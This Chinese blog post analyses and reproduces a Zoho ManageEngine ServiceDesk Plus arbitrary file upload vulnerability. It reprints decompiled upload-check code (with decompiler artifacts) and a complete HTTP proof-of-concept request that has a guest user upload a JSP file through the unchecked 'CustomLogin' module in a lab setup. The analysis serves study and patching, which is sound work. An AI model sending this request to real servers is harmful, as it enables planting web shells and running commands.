热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

FireEye红队失窃工具大揭秘之:分析复现Zoho任意文件上传漏洞(CVE20208394)

 前言最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗。虽然目前尚不清楚这些红队工具将被如何处置,但FireEye 公司在 Git

 

前言

最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗。虽然目前尚不清楚这些红队工具将被如何处置,但FireEye 公司在 GitHub 上发布了一些应对措施。奇安信代码安全实验室将从技术角度,对 GitHub 仓库中的相关漏洞进行分析复现,希望能给读者带来一些启发,做好防御措施。

 

漏洞简介

Zoho企业的产品 Zoho ManageEngine ServiceDesk Plus 是一套IT互联网服务管理软件,拥有资产管理、采购管理、合同管理等功能模块,提供一流的IT支持服务。

ServiceDesk Plus10.0 build 10012之前的版本产品存在任意文件上传漏洞。具体来说,SDJSPClasses.jar包的FileAttachment_jsp.class仅检查module参数为“SSP”、“DashBoard”、“HomePage”时的上传文件类型,而未检查module参数为“CustomLogin”时的上传文件类型,导致恶意分子采用低权限guest用户即能上传、并任意访问jsp类可执行命令的脚本文件。

 

受影响产品

Zohocorp ManageEngine ServiceDesk Plus

 

受影响版本

9.4 and 10.0 before 10.0 build 10012

 

修复版本

version>=10.0 build 10013

 

漏洞验证环境

Ubuntu16.04(服务器)
Windows 10(攻击机)

 

漏洞分析与利用

分析文件上传逻辑,确定缺陷位置并上传文件。

第一步,在服务端安装 Zohocorp ManageEngine ServiceDesk Plus 10.0 build 10000,随后启动服务,下图表示启动成功。

第二步,在攻击机中,采用 Burp Suite 捕获低权限guest用户的COOKIE信息和数据包,以便开展后续POC的构建工作,如下。

第三步,分析服务端文件上传核心代码。打开\ManageEngine\ServiceDesk\lib\SDJSPClasses.jar! \org\apache\jsp\common\FileAttachment_jsp.class,核心的文件上传检测代码和注释信息如下。

if (sizeOfFile limitExceeded = false;
filePath = "Attachments" + filSep + module + filSep + value;
// 如果module参数是"CustomLogin",则直接将文件上传至路径"../custom/login"
if (module.equals("CustomLogin")) {
filePath = ".." + filSep + "custom" + filSep + "login";
}

File uploadedFile = new File(filePath + filSep + fileName);
// 如果module参数是"SSP"、"DashBoard"、"HomePage",则检查文件后缀是否是“htm”或“html”,如不是,则拒绝上传
if (module.equals("SSP") || module.equals("DashBoard") || module.equals("HomePage")) {
String ext = "";
int i = fileName.lastIndexOf(46);
if (i > 0) {
ext = fileName.substring(i + 1);
if (!ext.equals("htm") && !ext.equals("html")) {
out.write("\n

  • ssp.widget.onAttachEmpty
  • ");
    out.write("\n ");
    return;
    }

    filSep = "/";
    filePath = ".." + filSep + "custom" + filSep + "widgets" + filSep + module;
    if (module.equals("DashBoard")) {
    String view = request.getParameter("view");
    filePath = ".." + filSep + "custom" + filSep + "widgets" + filSep + module + filSep + view;
    }

    uploadedFile = new File(filePath + filSep + fileName);
    int attIndex = false;
    int attIndex = fileName.lastIndexOf(".");
    String name = fileName;
    ext = "";
    if (attIndex != -1) {
    name = fileName.substring(0, attIndex);
    ext = fileName.substring(attIndex);
    }

    int j = 0;

    String fileName1;
    for(fileName1 = fileName; uploadedFile.exists(); uploadedFile = new File(filePath + filSep + fileName1)) {
    fileName1 = name + "(" + j + ")" + ext;
    ++j;
    }

    fileName = fileName1;
    }
    }

    File mkdir = new File(filePath);
    mkdir.mkdirs();
    item.wri

    分析可知,服务器首先判断module参数是否为“CustomLogin”,如是,则可直接上传任意类型的文件至服务端,程序执行完毕;否则继续执行代码,进入 module 参数属于 “SSP”、”DashBoard”、”HomePage” 的判别过程。如果module 参数为 “SSP”、”DashBoard” 或 “HomePage”,则进行安全过滤仅可上传 “htm”、“html” 类型文件至服务端。因此,当 module 参数是 “CustomLogin” 时,可以上传 jsp 脚本文件。

    第四步,构造 PoC。在 Burpsuite 中,构造数据包如下。

    POST /common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1

    Host: 192.168.6.135:8081

    Content-Length: 366

    Accept: */*

    Origin: http://192.168.6.135:8081

    X-Requested-With: XMLHttpRequest

    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36

    Content-Type: multipart/form-data; boundary=----aaa

    Referer: http://192.168.6.135:8081/DashBoard.do

    Accept-Encoding: gzip, deflate

    Accept-Language: en-US,en;q=0.9,vi;q=0.8

    COOKIE: sdpcsrfCOOKIE=bd678a1d-28b9-4eae-9d5d-f3a7e6f0bd88; servicedeskplus-_zldp=LsfUh%2FKeku9L3s3nPEJp8WNr%2BtCatkARgcAlZRum6ctL03zZZshSooiaABpQbhelmKwM1K1ctjo%3D; servicedeskplus-_zldt=01bc454f-6f2a-492e-889a-6d6b6ffde97d-2; SDPSESSIOnID=B7BB216915E8FB5476DA8774161B9474; JSESSIOnID=A7BEE85ED00E1AD81BB9E8081BA49D7D; JSESSIOnIDSSO=601A38BD1F283CA55D289D78564E09CA

    Connection: close



    ------aaa

    Content-Disposition: form-data; name="sspsetup"



    Attach

    ------aaa

    Content-Disposition: form-data; name="module"



    CustomLogin

    ------aaa

    Content-Disposition: form-data; name="filePath"; filename="test.jsp"

    Content-Type: text/html



    This is shell content

    ------aaa

    Content-Disposition: form-data; name="hmtlcontent"





    ------aaa--

    分析可知,访问拥有文件上传功能的核心代码,设置 module 参数为 “CustomLogin”,在内容栏设置test.jsp文件的内容是 “This is shell content”。

    第五步,访问脚本文件。重新启动服务后,直接访问脚本文件。例如http://192.168.6.135:8081/custom/login/test.jsp,如下。

    观察可知,成功访问脚本文件,说明任意文件上传成功。

     

    总结

    本文分析Zoho ManageEngine的任意文件上传漏洞,作者认为此漏洞由未过滤上传文件类型造成,使脚本文件被上传并利用;学习人员应提升java web知识,以顺利分析并利用输入参数的过滤缺陷。

     

    参考文献

    (1) Index of /service-desk/10000
    http://archives.manageengine.com/service-desk/10000/

    (2) 手册
    https://www.manageengine.cn/products/service-desk/help/adminguide/introduction/start-servicedeskplus-server.html

    (3) Zoho ManageEngine ServiceDesk Plus (SDP) <10.0 build 10012 – Arbitrary File Upload – JSP webapps Exploit
    https://www.exploit-db.com/exploits/46413

    关于 FireEye 红队失窃工具的漏洞分析系列文章暂告一段落,我们会随时关注相关漏洞的进展,敬请关注~


    推荐阅读
    • Explore how Matterverse is redefining the metaverse experience, creating immersive and meaningful virtual environments that foster genuine connections and economic opportunities. ... [详细]
    • 1:有如下一段程序:packagea.b.c;publicclassTest{privatestaticinti0;publicintgetNext(){return ... [详细]
    • 本文详细介绍了如何在Linux系统上安装和配置Smokeping,以实现对网络链路质量的实时监控。通过详细的步骤和必要的依赖包安装,确保用户能够顺利完成部署并优化其网络性能监控。 ... [详细]
    • PHP 5.2.5 安装与配置指南
      本文详细介绍了 PHP 5.2.5 的安装和配置步骤,帮助开发者解决常见的环境配置问题,特别是上传图片时遇到的错误。通过本教程,您可以顺利搭建并优化 PHP 运行环境。 ... [详细]
    • 本文详细介绍了 Dockerfile 的编写方法及其在网络配置中的应用,涵盖基础指令、镜像构建与发布流程,并深入探讨了 Docker 的默认网络、容器互联及自定义网络的实现。 ... [详细]
    • 使用 Azure Service Principal 和 Microsoft Graph API 获取 AAD 用户列表
      本文介绍了一段通用代码示例,该代码不仅能够操作 Azure Active Directory (AAD),还可以通过 Azure Service Principal 的授权访问和管理 Azure 订阅资源。Azure 的架构可以分为两个层级:AAD 和 Subscription。 ... [详细]
    • 如何配置Unturned服务器及其消息设置
      本文详细介绍了Unturned服务器的配置方法和消息设置技巧,帮助用户了解并优化服务器管理。同时,提供了关于云服务资源操作记录、远程登录设置以及文件传输的相关补充信息。 ... [详细]
    • UNP 第9章:主机名与地址转换
      本章探讨了用于在主机名和数值地址之间进行转换的函数,如gethostbyname和gethostbyaddr。此外,还介绍了getservbyname和getservbyport函数,用于在服务器名和端口号之间进行转换。 ... [详细]
    • 2023年京东Android面试真题解析与经验分享
      本文由一位拥有6年Android开发经验的工程师撰写,详细解析了京东面试中常见的技术问题。涵盖引用传递、Handler机制、ListView优化、多线程控制及ANR处理等核心知识点。 ... [详细]
    • 本文介绍了如何使用PHP代码实现微信平台的媒体素材上传功能,详细解释了API接口的使用方法和注意事项,确保文件路径正确以避免常见的错误。 ... [详细]
    • 使用Python在SAE上开发新浪微博应用的初步探索
      最近重新审视了新浪云平台(SAE)提供的服务,发现其已支持Python开发。本文将详细介绍如何利用Django框架构建一个简单的新浪微博应用,并分享开发过程中的关键步骤。 ... [详细]
    • 帝国CMS多图上传插件详解及使用指南
      本文介绍了一款用于帝国CMS的多图上传插件,该插件通过Flash技术实现批量图片上传功能,显著提升了多图上传效率。文章详细说明了插件的安装、配置和使用方法。 ... [详细]
    • 本文详细探讨了JDBC(Java数据库连接)的内部机制,重点分析其作为服务提供者接口(SPI)框架的应用。通过类图和代码示例,展示了JDBC如何注册驱动程序、建立数据库连接以及执行SQL查询的过程。 ... [详细]
    • 解决JAX-WS动态客户端工厂弃用问题并迁移到XFire
      在处理Java项目中的JAR包冲突时,我们遇到了JaxWsDynamicClientFactory被弃用的问题,并成功将其迁移到org.codehaus.xfire.client。本文详细介绍了这一过程及解决方案。 ... [详细]
    • 深入解析 Spring Security 用户认证机制
      本文将详细介绍 Spring Security 中用户登录认证的核心流程,重点分析 AbstractAuthenticationProcessingFilter 和 AuthenticationManager 的工作原理。通过理解这些组件的实现,读者可以更好地掌握 Spring Security 的认证机制。 ... [详细]
    author-avatar
    手机用户随便转转
    这个家伙很懒,什么也没留下!
    PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
    Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有